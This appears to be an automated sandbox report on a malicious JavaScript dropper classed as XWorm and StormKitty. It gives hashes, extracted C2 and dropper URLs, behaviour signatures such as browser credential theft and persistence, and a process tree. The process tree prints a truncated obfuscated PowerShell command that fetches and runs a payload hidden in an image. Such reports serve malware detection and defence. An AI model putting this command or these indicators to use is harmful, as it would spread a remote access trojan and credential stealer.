Overview

overview

10

Static

static

1

c6b076cf47...168.js

windows7-x64

10

c6b076cf47...168.js

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 19:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js

  • Size

    328KB

  • MD5

    6837307ec45d904b112be679217c4753

  • SHA1

    10e00ce374f8ebb3e54f6d26d99e8db6a6383e15

  • SHA256

    c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168

  • SHA512

    32087813f7826c052415592313a77a362033133034f0ad055480f063c4aa5d1de3da2e4bb38919da67f0f13e984d71f66c52455ed254634825f453f964717ef5

  • SSDEEP

    6144:O591JBdVhpcc1FRh1FZp2WlFBhlFJpkU1FxB1F5J2WlFhBlFpJAw1FRh1FZp2Wl6:O591JBdVhpcc1FRh1FZp2WlFBhlFJpkl

Score
10/10
stormkittyxwormcredential_accessdiscoveryexecutionpersistenceratstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

xworm

Version

5.0

C2

lisa22194141.duckdns.org:7000

Mutex

x8iJFYABjI83VZm2

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c6b076cf47cd1b57a71acfb1e5d257c657403af0ae983f4084a4057e18e81168.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷VQBy㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBo㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bw㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷Og㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQBh㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷dQBz㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷HY㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷cgBn㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷aQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBz㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Xw㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Nw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷agBw㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷dwBl㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷QwBs㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷LQBP㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷TgBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBX㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷YgBD㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷ZQBi㏵ ⊷ ➟ ⇒ ▷EM㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgB0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷bgBs㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBV㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EU㏵ ⊷ ➟ ⇒ ▷bgBj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBV㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Rg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷UwB0㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷aQBu㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBC㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBT㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷QQBS㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Pg㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBF㏵ ⊷ ➟ ⇒ ▷E4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷D4㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBU㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷E8㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷TwBm㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BG㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cs㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷LgBM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷YgBh㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷T㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBT㏵ ⊷ ➟ ⇒ ▷HU㏵ ⊷ ➟ ⇒ ▷YgBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Zw㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷QwBv㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBG㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBt㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷YQBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ 